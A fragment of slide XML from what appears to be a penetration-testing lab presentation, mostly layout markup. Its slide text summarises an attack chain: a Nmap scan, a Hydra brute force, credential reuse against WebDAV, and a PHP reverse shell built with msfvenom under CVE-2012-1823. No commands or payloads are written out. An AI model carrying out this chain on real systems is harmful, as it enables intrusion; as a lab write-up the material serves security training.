              <a:t>CVE-2012-2311</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Nmap scan revealed port 80 was open and running a vulnerable web server. A Hydra brute force attack on a secret folder revealed private information that allowed us to pivot to a WebDAV server utilizing compromised credentials.</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Gained entry to secret folder and gained information about a point of entry into the system we could use to deliver our PHP reverse shell payload.</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443234" y="1717050"/>
            <a:ext cx="2287375" cy="674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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CVE-2012-1823</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Utilize msfvenom on the Kali machine to craft a PHP reverse shell payload. We then used Metasplopit to setup a listener before deploying the reverse shell.</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Successfully crafted reverse shell and deployed Kali machine as listener.</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29" name="Google Shape;1129;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6555722" y="1777072"/>
            <a:ext cx="2119400" cy="62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